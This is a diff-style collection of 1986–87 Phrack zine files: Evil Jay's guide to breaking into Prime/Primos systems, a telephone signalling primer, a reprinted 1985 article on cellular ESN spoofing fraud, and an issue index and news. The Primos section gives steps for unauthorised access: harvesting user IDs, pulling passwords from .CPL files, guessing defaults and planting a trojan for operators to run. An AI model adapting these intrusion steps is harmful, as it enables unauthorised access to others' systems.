and telephone lines) so that the announcement vocabulary can be downloaded
|
||||
from the ARCs if necessary.
|
||||
|
||||
:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:
|
||||
|
||||
Much of the information in this file is copied verbatim from the
|
||||
instructional booklet sent to me by CCI. Their documentation is extremely
|
||||
in-depth and well written, and, with some looking over, is easy to
|
||||
understand. Much of the information in here is confusing with all of the
|
||||
acronyms used as well as technical terms, but if you cross-reference acronyms
|
||||
throughout the file, you should be able to see what it stands for. Also, if
|
||||
you don't understand what something does, just think of it in terms of use by
|
||||
the telephone company in the context used and you can generally get an idea
|
||||
of what it does or is used for. I hope you enjoyed this file and continue to
|
||||
read Phrack Inc. files to learn more about the system we use and experience.
|
||||
Any constructive suggestions are welcomed directly or indirectly.
|
||||
|
||||
Taran King
|
||||
|
||||
:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:
|
209
phrack11/7.txt
Normal file
209
phrack11/7.txt
Normal file
|
@ -0,0 +1,209 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Eleven, Phile #7 of 12
|
||||
|
||||
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
|
||||
! !
|
||||
# Hacking Primos I, II, III #
|
||||
! !
|
||||
# (I&II Revised) #
|
||||
! !
|
||||
# By Evil Jay #
|
||||
! !
|
||||
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
|
||||
|
||||
|
||||
Author Note:
|
||||
|
||||
Ugg! I looked at my first file after it was released and saw a lot of
|
||||
misspellings, errors and other screw-ups and was completely embarrassed. I
|
||||
did not have time to edit the file and I was also writing the second file
|
||||
which dealt with gaining privileges. I threw these two files at Taran King
|
||||
who in turn merged them together. So I humbly apologize for all of the
|
||||
errors in the last file. In this file I will revise the old file and
|
||||
continue with some more methods of gaining access and also list out some
|
||||
very basic commands for beginners. As I said before, if you have any
|
||||
questions you can reach me on any board I am currently inhabiting. Hope to
|
||||
hear from you...
|
||||
|
||||
|
||||
*** Gaining Access From Scratch ***
|
||||
|
||||
I made a mistake in my last file and stated that FAM was not a default. FAM
|
||||
is a default, but it can be taken out by the system administrators.
|
||||
|
||||
|
||||
To get a listing of every possible account on a system, it is really quite
|
||||
easy. They are located in the MFD directories. Type:
|
||||
|
||||
A MFD <MFD #> (Without the "<" and ">" signs)
|
||||
|
||||
Or just:
|
||||
|
||||
A MFD
|
||||
|
||||
Then type LD and hit return. Now, you will see a listing of files and
|
||||
underneath should be a listing of directories appropriately named
|
||||
Directories. These directories are valid User IDs. However, I believe that
|
||||
directories that have an "*" character in them cannot be logged in to.
|
||||
|
||||
|
||||
*** Getting Higher Access Revised ***
|
||||
|
||||
SYS1 is the highest system level there is. Meaning unless commands have to
|
||||
be entered from the supervisors terminal, you can usually do anything with an
|
||||
account that has SYS1 access. Also, I should clarify that SYS1 will not
|
||||
always be the name of the highest access available. It could be named SYSTEM
|
||||
or anything for that matter.
|
||||
|
||||
You are looking for a file with the extension .CPL - look for this file
|
||||
under any of the SYS1 directories. When you find one, SLIST it. You are
|
||||
looking for a line similar to:
|
||||
|
||||
A <DIRECTORY NAME> <PASSWORD>
|
||||
|
||||
It could look like:
|
||||
|
||||
A LIB XXX
|
||||
|
||||
LIB is the directory (user id) name.
|
||||
|
||||
XXX is the password to that directory (user id).
|
||||
|
||||
|
||||
When you have this, log into that account with the directory name and
|
||||
password. If your lucky you'll gain access to that account. I have noticed
|
||||
that a lot of high access accounts sometimes have the password XXXXXX or X.
|
||||
Try these, I am unsure as to whether they are actual defaults or not.
|
||||
|
||||
|
||||
Ah, the revision is done! Now some more ways to gain access...
|
||||
|
||||
|
||||
*** The Trojan Horse ***
|
||||
|
||||
Providing you have access, you may or may not be able to edit a file in a
|
||||
high access directory. If you can't then try the above technique and try to
|
||||
hack a higher level account.
|
||||
|
||||
|
||||
You will first want to learn the Command Processing Language (CPL). Type
|
||||
HELP CPL for a list of commands and then play around and try to write your
|
||||
own programs. If you don't have a manual handy, look at other CPL programs in
|
||||
other directories you can access. Once you know CPL, all you have to do is
|
||||
edit a CPL file in a high access dir. Add your own high level commands to the
|
||||
program. Then replace the old file, logoff and wait until the operator(s)
|
||||
decide to run your program. Hopefully, if everything goes well your routines
|
||||
will help you with whatever you wanted. However it would be a good idea to
|
||||
have your TH write a file to your directory telling you whether it has been
|
||||
ran or not. I will discuss different Trojan Horses in later issues of Phrack.
|
||||
|
||||
|
||||
Once on a Prime it is pretty easy to get other accounts so don't worry about
|
||||
it. Just worry about getting on in the first place. Patience is definitely
|
||||
required since many systems (particularly versions 19 up) tend to hang up
|
||||
after the first invalid id/password combo.
|
||||
|
||||
|
||||
|
||||
*** Basic Commands For Beginners ***
|
||||
|
||||
|
||||
This is a list of basic commands you can use once on a Prime system. I will
|
||||
not go in-depth on a command, because you can do that for yourself by
|
||||
typing:
|
||||
|
||||
HELP <COMMAND NAME>
|
||||
|
||||
|
||||
|
||||
SLIST <FILENAME>
|
||||
|
||||
This will list out the contents of a file on a directory. Type in the full
|
||||
file name (plus extension).
|
||||
|
||||
|
||||
ATTACH <DIRECTORY NAME>
|
||||
|
||||
This will attach you to another directory. For a full explanation type HELP
|
||||
ATTACH.
|
||||
|
||||
|
||||
LD
|
||||
|
||||
This will list all the files and subdirectories in a directory.
|
||||
|
||||
|
||||
RLS -ALL
|
||||
|
||||
Commands add up on the stack, and eventually after a pre-determined amount of
|
||||
commands you will get a message telling you that you are "now at command level
|
||||
XX". This command will release all those pent up commands in the stack.
|
||||
|
||||
|
||||
CPL <FILENAME>
|
||||
|
||||
This will run a file with the extension ".CPL".
|
||||
|
||||
|
||||
COMINPUT <FILENAME>
|
||||
|
||||
This will run a file with the extension ".COM"
|
||||
|
||||
|
||||
SEG <FILENAME>
|
||||
|
||||
This will run a file with the extension ".SEG"
|
||||
|
||||
|
||||
STATUS USERS
|
||||
|
||||
This will give you a listing of users and other information currently on the
|
||||
system.
|
||||
|
||||
|
||||
STATUS
|
||||
|
||||
This will give you the status of the system and other information.
|
||||
|
||||
|
||||
EDIT (Or ED)
|
||||
|
||||
This is a text editor.
|
||||
|
||||
|
||||
CHANGE_PASSWORD <OLD PASSWORD>
|
||||
|
||||
Does just what it says it does.
|
||||
|
||||
|
||||
DELETE <FILENAME>
|
||||
|
||||
Deletes a file.
|
||||
|
||||
|
||||
LOGOFF
|
||||
|
||||
I think this is pretty obvious.
|
||||
|
||||
|
||||
LOGIN
|
||||
|
||||
This will log you out and take you back to the login process, providing there
|
||||
is no logins-over-logins set by the administrators.
|
||||
|
||||
|
||||
This is a very small list, but will probably help the beginner greatly when
|
||||
he/she first logs on. Hope you enjoyed this issue...Look for Hacking Primos
|
||||
Part IV in Phrack, 12. Mebbe'.
|
||||
|
||||
|
||||
|
||||
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
|
||||
! !
|
||||
# A Phrack,Inc #
|
||||
! !
|
||||
# Presentation #
|
||||
! !
|
||||
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
|
||||
=========================================================================
|
143
phrack11/8.txt
Normal file
143
phrack11/8.txt
Normal file
|
@ -0,0 +1,143 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Eleven, Phile #8 of 12
|
||||
|
||||
|
||||
Telephone Signalling Methods
|
||||
----------------------------
|
||||
|
||||
|
||||
Written by Doom Prophet
|
||||
|
||||
|
||||
This file explains the basic signalling methods in use by the telephone
|
||||
system and is intended for general understanding. The text that follows is not
|
||||
highly technical since this file is for basic understanding and aimed at less
|
||||
experienced phreaks. Still, the more experienced readers may want to read it
|
||||
as a review on the information.
|
||||
|
||||
|
||||
Analog--Analog signals are those that have continuously and smoothly
|
||||
varying amplitude or frequency. Speech signals are of this type when you
|
||||
consider tone, pitch and volume levels that vary according to the person
|
||||
speaking. When a person speaks into the transmitter on a telephone, the voice
|
||||
signals are made up of acoustical energy, which are then converted into
|
||||
electrical energy for transmission along a transmission medium.
|
||||
|
||||
Analog carrier facilities may operate over different media, such as wire
|
||||
lines, multi-wire cable, coaxial cable, or fiber optic cable. Copper wire is
|
||||
the most commonly used for subscriber loops.
|
||||
|
||||
|
||||
A technique that allows for many signals to be sent along the same
|
||||
transmission path is called Multiplexing. Analog signals use Frequency
|
||||
Division Multiplexing or FDM.
|
||||
|
||||
|
||||
Digital--Instead of the voice signal being processed as an analog signal,
|
||||
it is converted into a digital signal and handled with digital circuits
|
||||
throughout the transmission process. When it arrives at the CO that serves the
|
||||
called telephone, it is converted back to analog to reproduce the original
|
||||
voice transmission.
|
||||
|
||||
|
||||
Pulse Code Modulation or PCM is when the binary signal is transmitted in
|
||||
serial form. Binary coding represents bits or binary digits at 0 and 1 levels.
|
||||
These levels have a definite time relationship with one another. Time Division
|
||||
Multiplexing or TDM is the type of multiplexing, sometimes abbreviated as MUX,
|
||||
done for digital transmission.
|
||||
|
||||
|
||||
Metallic--Metallic facilities carry only one Voice Frequency (VF) channel.
|
||||
Typically, a metallic facility is used to connect business or residential
|
||||
lines to a CO. Coaxial cable can be used to transmit both Analog and Digital
|
||||
signals as well as Metallic signals.
|
||||
|
||||
|
||||
VF channels have a 4000 Hz bandwidth, from 0 to 4000 Hz. However, the
|
||||
in-band range of the voice frequency is between 200 and 3400 Hz. Signals that
|
||||
are out of this frequency range but still within the VF channel are out of
|
||||
band signals. A supervisory equivalent to 2600 for out of band is 3700 Hz. The
|
||||
amount of VF channels vary according to the transmission facilities that are
|
||||
being used.
|
||||
|
||||
|
||||
CCIS (Common Channel Interoffice Signalling) is where control or
|
||||
supervisory signals are sent on a separate data link between switching
|
||||
offices. CCIS links operate at 4800 bps, or baud. Signal Transfer Points in
|
||||
the switch send the supervisory information over the dedicated link. This
|
||||
prevents supervisory tones from subscriber stations to register with the
|
||||
telephone network as a change in trunk status.
|
||||
|
||||
|
||||
Reverse Battery Signalling- When the called end answers, the polarity and
|
||||
condition of the Ring and Tip leads is reversed to indicate the status of the
|
||||
connection. Conditions for a call being placed, but not yet answered, is
|
||||
ground on the Tip and battery (the CO battery current is flowing through) on
|
||||
the Ring. When the called party answers, by the action of relays in the
|
||||
switching equipment, current is reversed in the calling subscriber loop and
|
||||
battery is placed on the Tip and ground on the Ring, which remains during the
|
||||
talking.
|
||||
|
||||
|
||||
E and M- Leads connecting switching equipment to trunk circuits are termed
|
||||
the E and M leads, for receive and transmit. The E lead reflects the far-end
|
||||
or terminating end condition of the trunk. Ground on the E lead indicates that
|
||||
a signal has been received from the other end. The E lead is open when the
|
||||
trunk is idle. The M lead reflects the the near end condition of the trunk. It
|
||||
is grounded when the trunk is idle, and goes to battery condition when the
|
||||
called party goes off hook. Long interoffice and short haul toll trunks use
|
||||
this signalling method.
|
||||
|
||||
|
||||
It should be noted that AC signalling is Alternating Current, and is used
|
||||
on the intertoll network, and interoffice and short haul toll trunks. DC, or
|
||||
direct current, is used on two wire or intraoffice connections, and local
|
||||
interoffice trunks.
|
||||
|
||||
Single Frequency (SF)- Single Frequency is an in-band 2600 Hz signalling
|
||||
system. When a four wire trunk is idle, and is equipped for SF in band
|
||||
signalling, a 2600 Hz tone is being transmitted in both directions. When the
|
||||
trunk is seized at an originating position, the M lead is changed from ground
|
||||
to battery state. This removes the 2600 Hz supervisory tone from the outgoing
|
||||
trunk pair. The loss of the 2600 Hz will be detected at the far end by the SF
|
||||
signalling unit, changing the far end E lead condition from open to ground,
|
||||
causing switching equipment to function. When ground is restored to the M
|
||||
lead, replacing 2600 on the near end trunk, the pulsing of address information
|
||||
begins.
|
||||
|
||||
|
||||
Multi-Frequency (MF)- The MF pulsing method uses AC signals in the voice
|
||||
frequency range, and transmits address information between COs by combinations
|
||||
of only 2 of 5 frequencies. MF is used for the sending of address information,
|
||||
as mentioned before. Other signalling methods are still required for trunk
|
||||
control and supervision. There are six MFs comprising MF codes. These are 200
|
||||
Hz apart in the 700-1700 range. Two frequencies are sent at once, thus
|
||||
explaining the term 'Multi frequency.'
|
||||
|
||||
|
||||
MF pulsing is initiated by manual keysets and the TSPS switchboard, or by
|
||||
MF outpulsing senders in ESS and Xbar. MF pulsing is very rapid and only
|
||||
occurs when a connection is being established. KPs, or Key Pulses, are used as
|
||||
a signal to start MF pulsing. STs, or STart tones are used as a signal to
|
||||
indicate the end of MF pulsing.
|
||||
|
||||
|
||||
As an example of MF signalling, take a toll switchboard trunk connected to
|
||||
a Xbar Central Office. The operator selects an idle trunk, and presses the KP
|
||||
button on the keyset to signal the distant sender or register link equipment
|
||||
to connect to a MF receiver. The S lamp on the keyset will light when the far
|
||||
end is ready to receive MF pulses. After keypulsing the digits of the called
|
||||
number, the operator presses the ST button, which indicates the end of pulsing
|
||||
and disconnects the keyset from the operator's cord circuit and extinguishes
|
||||
the KP and S lamps.
|
||||
|
||||
|
||||
At the terminating CO, the two MF tones of each digit are amplified and
|
||||
limited in the MF receiver unit associated with the incoming sender and
|
||||
register circuit. The frequencies are selected by channel filters in the MF
|
||||
receiver and then detected. The DC voltage that results will operate the
|
||||
proper channel relays to continue with the process of placing the call.
|
||||
|
||||
|
||||
|
280
phrack11/9.txt
Normal file
280
phrack11/9.txt
Normal file
|
@ -0,0 +1,280 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Eleven, Phile #9 of 12
|
||||
|
||||
--------------------------------------------------------------------------
|
||||
The following is reprinted from the November 1985 issue of Personal
|
||||
Communications Technology magazine by permission of the authors and
|
||||
the publisher, FutureComm Publications Inc., 4005 Williamsburg Ct.,
|
||||
Fairfax, VA 22032, 703/352-1200.
|
||||
|
||||
Copyright 1985 by FutureComm Publications Inc. All rights reserved.
|
||||
--------------------------------------------------------------------------
|
||||
|
||||
|
||||
THE ELECTRONIC SERIAL NUMBER: A CELLULAR 'SIEVE'?
|
||||
'SPOOFERS' CAN DEFRAUD USERS AND CARRIERS
|
||||
|
||||
by Geoffrey S. Goodfellow, Robert N. Jesse, and Andrew H. Lamothe, Jr.
|
||||
|
||||
|
||||
What's the greatest security problem with cellular phones? Is it privacy of
|
||||
communications? No.
|
||||
|
||||
Although privacy is a concern, it will pale beside an even greater problem:
|
||||
spoofing.
|
||||
|
||||
'Spoofing' is the process through which an agent (the 'spoofer') pretends to
|
||||
be somebody he isn't by proffering false identification, usually with intent
|
||||
to defraud. This deception, which cannot be protected against using the
|
||||
current U.S. cellular standards, has the potential to create a serious
|
||||
problem--unless the industry takes steps to correct some loopholes in the
|
||||
present cellular standards.
|
||||
|
||||
Compared to spoofing, the common security concern of privacy is not so severe.
|
||||
Most cellular subscribers would, at worst, be irked by having their
|
||||
conversational privacy violated. A smaller number of users might actually
|
||||
suffer business or personal harm if their confidential exchanges were
|
||||
compromised. For them, voice encryption equipment is becoming increasingly
|
||||
available if they are willing to pay the price for it.
|
||||
|
||||
Thus, even though technology is available now to prevent an interloper from
|
||||
overhearing sensitive conversations, cellular systems cannot--at any
|
||||
cost--prevent pirates from charging calls to any account. This predicament is
|
||||
not new to the industry. Even though cellular provides a modern,
|
||||
sophisticated quality mobile communications service, it is not fundamentally
|
||||
much safer than older forms of mobile telephony.
|
||||
|
||||
History of Spoofing Vulnerability
|
||||
|
||||
The earliest form of mobile telephony, unsquelched manual Mobile Telephone
|
||||
Service (MTS), was vulnerable to interception and eavesdropping. To place a
|
||||
call, the user listened for a free channel. When he found one, he would key
|
||||
his microphone to ask for service: 'Operator, this is Mobile 1234; may I
|
||||
please have 555-7890.' The operator knew to submit a billing ticket for
|
||||
account number 1234 to pay for the call. So did anybody else listening to the
|
||||
channel--hence the potential for spoofing and fraud.
|
||||
|
||||
Squelched channel MTS hid the problem only slightly because users ordinarily
|
||||
didn't overhear channels being used by other parties. Fraud was still easy
|
||||
for those who turned off the squelch long enough to overhear account numbers.
|
||||
|
||||
Direct-dial mobile telephone services such as Improved Mobile Telephone
|
||||
Service (IMTS) obscured the problem a bit more because subscriber
|
||||
identification was made automatically rather than by spoken exchange between
|
||||
caller and operator. Each time a user originated a call, the mobile telephone
|
||||
transmitted its identification number to the serving base station using some
|
||||
form of Audio Frequency Shift Keying (AFSK), which was not so easy for
|
||||
eavesdroppers to understand.
|
||||
|
||||
Committing fraud under IMTS required modification of the mobile--restrapping
|
||||
of jumpers in the radio unit, or operating magic keyboard combinations in
|
||||
later units--to reprogram the unit to transmit an unauthorized identification
|
||||
number. Some mobile control heads even had convenient thumb wheel switches
|
||||
installed on them to facilitate easy and frequent ANI (Automatic Number
|
||||
Identification) changes.
|
||||
|
||||
Cellular Evolution
|
||||
|
||||
Cellular has evolved considerably from these previous systems. Signaling
|
||||
between mobile and base stations uses high-speed digital techniques and
|
||||
involves many different types of digital messages. As before, the cellular
|
||||
phone contains its own Mobile Identification Number (MIN), which is programmed
|
||||
by the seller or service shop and can be changed when, for example, the phones
|
||||
sold to a new user. In addition, the U.S. cellular standard incorporates a
|
||||
second number, the 'Electronic Serial Number' (ESN), which is intended to
|
||||
uniquely and permanently identify the mobile unit.
|
||||
|
||||
According to the Electronic Industries Association (EIA) Interim Standard
|
||||
IS-3-B, Cellular System Mobile Station--Land Station Compatibility
|
||||
Specification (July 1984), 'The serial number is a 32-bit binary number that
|
||||
uniquely identifies a mobile station to any cellular system. It must be
|
||||
factory-set and not readily alterable in the field. The circuitry that
|
||||
provides the serial number must be isolated from fraudulent contact and
|
||||
tampering. Attempts to change the serial number circuitry should render the
|
||||
mobile station inoperative.'
|
||||
|
||||
The ESN was intended to solve two problems the industry observed with its
|
||||
older systems.
|
||||
|
||||
First, the number of subscribers that older systems could support fell far
|
||||
short of the demand in some areas, leading groups of users to share a single
|
||||
mobile number (fraudulently) by setting several phones to send the same
|
||||
identification. Carriers lost individual user accountability and their means
|
||||
of predicting and controlling traffic on their systems.
|
||||
|
||||
Second, systems had no way of automatically detecting use of stolen equipment
|
||||
because thieves could easily change the transmitted identification.
|
||||
|
||||
In theory, the required properties of the ESN allow cellular systems to check
|
||||
to ensure that only the correctly registered unit uses a particular MIN, and
|
||||
the ESNs of stolen units can be permanently denied service ('hot-listed').
|
||||
This measure is an improvement over the older systems, but vulnerabilities
|
||||
remain.
|
||||
|
||||
Ease of ESN Tampering
|
||||
|
||||
Although the concept of the unalterable ESN is laudable in theory, weaknesses
|
||||
are apparent in practice. Many cellular phones are not constructed so that
|
||||
'attempts to change the serial number circuitry renders the mobile station
|
||||
inoperative.' We have personally witnessed the trivial swapping of one ESN
|
||||
chip for another in a unit that functioned flawlessly after the switch was
|
||||
made.
|
||||
|
||||
Where can ESN chips be obtained to perform such a swap? We know of one recent
|
||||
case in the Washington, D.C. area in which an ESN was 'bought' from a local
|
||||
service shop employee in exchange for one-half gram of cocaine. Making the
|
||||
matter simpler, most manufacturers are using industry standard Read-Only
|
||||
Memory (ROM) chips for their ESNs, which are easily bought and programmed or
|
||||
copied.
|
||||
|
||||
Similarly, in the spirit of research, a west coast cellular carrier copied the
|
||||
ESN from one manufacturer's unit to another one of the same type and
|
||||
model--thus creating two units with the exact same identity.
|
||||
|
||||
The ESN Bulletin Board
|
||||
|
||||
For many phones, ESN chips are easy to obtain, program, and install. How does
|
||||
a potential bootlegger know which numbers to use? Remember that to obtain
|
||||
service from a system, a cellular unit must transmit a valid MIN (telephone
|
||||
number) and (usually) the corresponding serial number stored in the cellular
|
||||
switch's database.
|
||||
|
||||
With the right equipment, the ESN/MIN pair can be read right off the air
|
||||
because the mobile transmits it each time it originates a call. Service shops
|
||||
can capture this information using test gear that automatically receives and
|
||||
decodes the reverse, or mobile-to-base, channels.
|
||||
|
||||
Service shops keep ESN/MIN records on file for units they have sold or
|
||||
serviced, and the carriers also have these data on all of their subscribers.
|
||||
Unscrupulous employees could compromise the security of their customers'
|
||||
telephones.
|
||||
|
||||
In many ways, we predict that 'trade' in compromised ESN/MIN pairs will
|
||||
resemble what currently transpires in the long distance telephone business
|
||||
with AT&T credit card numbers and alternate long-distance carrier (such as
|
||||
MCI, Sprint and Alltel) account codes. Code numbers are swapped among
|
||||
friends, published on computer 'bulletin boards' and trafficked by career
|
||||
criminal enterprises.
|
||||
|
||||
Users whose accounts are being defrauded might--or might not--eventually
|
||||
notice higher-than-expected bills and be reassigned new numbers when they
|
||||
complain to the carrier. Just as in the long distance business, however, this
|
||||
number 'turnover' (deactivation) won't happen quickly enough to make abuse
|
||||
unprofitable. Catching pirates in the act will be even tougher than it is in
|
||||
the wireline telephone industry because of the inherent mobility of mobile
|
||||
radio.
|
||||
|
||||
Automating Fraud
|
||||
|
||||
Computer hobbyists and electronics enthusiasts are clever people. Why should
|
||||
a cellular service thief 'burn ROMs' and muck with hardware just to install
|
||||
new IDs in his radio? No Herculean technology is required to 'hack' a phone
|
||||
to allow ESN/MIN programming from a keyboard, much like the IMTS phone thumb
|
||||
wheel switches described above.
|
||||
|
||||
Those not so technically inclined may be able to turn to mail-order
|
||||
entrepreneurs who will offer modification kits for cellular fraud, much as
|
||||
some now sell telephone toll fraud equipment and pay-TV decoders.
|
||||
|
||||
At least one manufacturer is already offering units with keyboard-programmable
|
||||
MINs. While intended only for the convenience of dealers and service shops,
|
||||
and thus not described in customer documentation, knowledgeable and/or
|
||||
determined end users will likely learn the incantations required to operate
|
||||
the feature. Of course this does not permit ESN modification, but easy MIN
|
||||
reprogrammability alone creates a tremendous liability in today's roaming
|
||||
environment.
|
||||
|
||||
The Rolls Royce of this iniquitous pastime might be a 'Cellular Cache-Box.' It
|
||||
would monitor reverse setup channels and snarf ESN/MIN pairs off the air,
|
||||
keeping a list in memory. Its owner could place calls as on any other
|
||||
cellphone. The Cache-Box would automatically select an ESN/MIN pair from its
|
||||
catalog, use it once and then discard it, thus distributing its fraud over
|
||||
many accounts. Neither customer nor service provider is likely to detect the
|
||||
abuse, much less catch the perpetrator.
|
||||
|
||||
As the history of the computer industry shows, it is not far-fetched to
|
||||
predict explosive growth in telecommunications and cellular that will bring
|
||||
equipment prices within reach of many experimenters. Already we have seen the
|
||||
appearance of first-generation cellular phones on the used market, and new
|
||||
units can be purchased for well under $1000 in many markets.
|
||||
|
||||
How High The Loss?
|
||||
|
||||
Subscribers who incur fraudulent charges on their bills certainly can't be
|
||||
expected to pay them. How much will fraud cost the carrier? If the charge is
|
||||
for home-system airtime only, the marginal cost to the carrier of providing
|
||||
that service is not as high as if toll charges are involved. In the case of
|
||||
toll charges, the carrier suffers a direct cash loss. The situation is at its
|
||||
worst when the spoofer pretends to be a roaming user. Most inter-carrier
|
||||
roaming agreements to date make the user's home carrier (real or spoofed)
|
||||
responsible for charges, who would then be out hard cash for toll and airtime
|
||||
charges.
|
||||
|
||||
We have not attempted to predict the dollar losses this chicanery might
|
||||
generate because there isn't enough factual information information for anyone
|
||||
to guess responsibly. Examination of current estimates of long-distance-toll
|
||||
fraud should convince the skeptic.
|
||||
|
||||
Solutions
|
||||
|
||||
The problems we have described are basically of two types. First, the ESN
|
||||
circuitry in most current mobiles is not tamper-resistant, much less
|
||||
tamper-proof. Second and more importantly, the determined perpetrator has
|
||||
complete access to all information necessary for spoofing by listening to the
|
||||
radio emissions from valid mobiles because the identification information
|
||||
(ESN/MIN) is not encrypted and remains the same with each transmission.
|
||||
|
||||
Manufacturers can mitigate the first problem by constructing mobiles that more
|
||||
realistically conform to the EIA requirements quoted above. The second
|
||||
problem is not beyond solution with current technology, either. Well-known
|
||||
encryption techniques would allow mobiles to identify themselves to the
|
||||
serving cellular system without transmitting the same digital bit stream each
|
||||
time. Under this arrangement, an interloper receiving one transmission could
|
||||
not just retransmit the same pattern and have it work a second time.
|
||||
|
||||
An ancillary benefit of encryption is that it would reasonably protect
|
||||
communications intelligence--the digital portion of each transaction that
|
||||
identifies who is calling whom when.
|
||||
|
||||
The drawback to any such solution is that it requires some re-engineering in
|
||||
the Mobile-Land Station Compatibility Specification, and thus new software or
|
||||
hardware for both mobiles and base stations. The complex logistics of
|
||||
establishing a new standard, implementing it, and retrofitting as much of the
|
||||
current hardware as possible certainly presents a tough obstacle, complicated
|
||||
by the need to continue supporting the non-encrypted protocol during a
|
||||
transition period, possibly forever.
|
||||
|
||||
The necessity of solving the problem will, however, become apparent. While we
|
||||
presently know of no documented cases of cellular fraud, the vulnerability of
|
||||
the current standards and experience with similar technologies lead us to
|
||||
conclude that it is inevitable. Failure to take decisive steps promptly will
|
||||
expose the industry to a far more expensive dilemma. XXX
|
||||
|
||||
|
||||
Geoffrey S. Goodfellow is a member of the senior research staff in the
|
||||
Computer Science Laboratory at SRI International, 333 Ravenswood Ave., Menlo
|
||||
Park, CA 94025, 415/859-3098. He is a specialist in computer security and
|
||||
networking technology and is an active participant in cellular industry
|
||||
standardization activities. He has provided Congressional testimony on
|
||||
telecommunications security and privacy issues and has co-authored a book on
|
||||
the computer 'hacking' culture.
|
||||
|
||||
Robert N. Jesse (2221 Saint Paul St., Baltimore, MD 21218, 301/243-8133) is an
|
||||
independent consultant with expertise in security and privacy, computer
|
||||
operating systems, telecommunications and technology management. He is an
|
||||
active participant in cellular standardization efforts. He was previously a
|
||||
member of the senior staff at The Johns Hopkins University, after he obtained
|
||||
his BES/EE from Johns Hopkins.
|
||||
|
||||
Andrew H. Lamothe, Jr. is executive vice-president of engineering at Cellular
|
||||
Radio Corporation, 8619 Westwood Center Dr., Vienna, VA 22180, 703/893-2680.
|
||||
He has played a leading role internationally in cellular technology
|
||||
development. He was with Motorola for 10 years prior to joining American
|
||||
TeleServices, where he designed and engineered the Baltimore/Washington market
|
||||
trial system now operated by Cellular One.
|
||||
--------
|
||||
|
||||
|
||||
A later note indicates that one carrier may be losing something like $180K per
|
||||
month....
|
42
phrack12/1.txt
Normal file
42
phrack12/1.txt
Normal file
|
@ -0,0 +1,42 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 12, Phile #1 of 11
|
||||
|
||||
Index
|
||||
~~~~~
|
||||
3/29/87
|
||||
|
||||
|
||||
Ok, so we made it through another few delayed weeks of saying a
|
||||
release was coming soon. But of course, I finally got motivated and got this
|
||||
issue moving. I'd like to thank many of the people who rushed themselves to
|
||||
get their articles to me when they didn't know that the release was so soon,
|
||||
and for those that haven't gotten their articles in in time (for two issues,
|
||||
mind you [no names mentioned, of course, but I felt a denotation would be
|
||||
sufficient to provide my feelings in the introduction]) a big, "Oh well."
|
||||
We're glad you've continued your patronage (Ha!) with Phrack Inc. over the
|
||||
past year and a half or so and a big thanks to all of the writers who have
|
||||
kept the publication going for all this time. But after this issue comes a
|
||||
break. Not a break in putting Phrack out, but a break in the grind and rush
|
||||
to get it out as I did with this issue. Phrack 13 will be EXTREMELY
|
||||
different, and I guarantee that to you. Phrack 13 will be released on April
|
||||
1st (hmm...ring any bells?) so be watching for it! Later
|
||||
|
||||
Taran King
|
||||
Sysop of Metal Shop Private
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
This issue of Phrack Inc. includes the following:
|
||||
|
||||
#1 Index of Phrack 12 by Taran King (2.3 k)
|
||||
#2 Pro-Phile IX on Agrajag The Prolonged by Taran King (6.7 k)
|
||||
#3 Preview to Phrack 13-The Life & Times of The Executioner (4.9 k)
|
||||
#4 Understanding the Digital Multiplexing System (DMS) by Control C (18.8 k)
|
||||
#5 The Total Network Data System by Doom Prophet (13.2 k)
|
||||
#6 CSDC II - Hardware Requirements by The Executioner (8.1 k)
|
||||
#7 Hacking : OSL Systems by Evil Jay (8.7 k)
|
||||
#8 Busy Line Verification Part II by Phantom Phreaker (9.1 k)
|
||||
#9 Scan Man's Rebuttal to Phrack World News (16.5 k)
|
||||
#10 Phrack World News XII Part I by Knight Lightning (13.3 k)
|
||||
#11 Phrack World News XII Part II by Knight Lightning (14.7 k)
|
239
phrack12/10.txt
Normal file
239
phrack12/10.txt
Normal file
|
@ -0,0 +1,239 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 12, Phile #10 of 11
|
||||
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
PWN PWN
|
||||
PWN >>>>>=-*{ Phrack World News }*-=<<<<< PWN
|
||||
PWN Issue XII/1 PWN
|
||||
PWN PWN
|
||||
PWN Created, Compiled, and Written PWN
|
||||
PWN by Knight Lightning PWN
|
||||
PWN PWN
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
|
||||
Local News March 20, 1987
|
||||
~~~~~~~~~~
|
||||
This issue of PWN marks the anniversary of Metal Shop Brewery.
|
||||
|
||||
Things are looking up. Metal Shop Private is back and all previous members
|
||||
are asked to call back. The same passwords and logons still work and even
|
||||
better, the old posts have been saved despite the hard drive crash a few
|
||||
months ago.
|
||||
|
||||
Phrack XIII will be released on April 1, 1987; April Fool's Day!
|
||||
|
||||
It features joke files, fiction files, humorous files, and of course, rag
|
||||
files. With all the seriousness of the regular issues of Phrack, this is a
|
||||
chance to release some building flashes of comedy. Please note that files for
|
||||
Phrack XIII can only be submitted by members of Metal Shop Private. This does
|
||||
not apply to other issues of Phrack. Don't miss it!
|
||||
|
||||
SummerCon 1987
|
||||
~~~~~~~~~~~~~~
|
||||
For those that don't already know, TeleComputist Newsletter and Phrack Inc.
|
||||
are sponsoring this year's big phreak gathering in St. Louis, Missouri. As
|
||||
many of you may note, St. Louis is the home of Metal Shop Private, Phrack
|
||||
Inc., and TeleComputist Newsletter. We all hope that since St. Louis is in
|
||||
the middle of the country that it will be easy for people to attend. We
|
||||
extend an invitation to anyone who wants to come. We will have a conference
|
||||
room and two suites in a hotel in St. Louis.
|
||||
|
||||
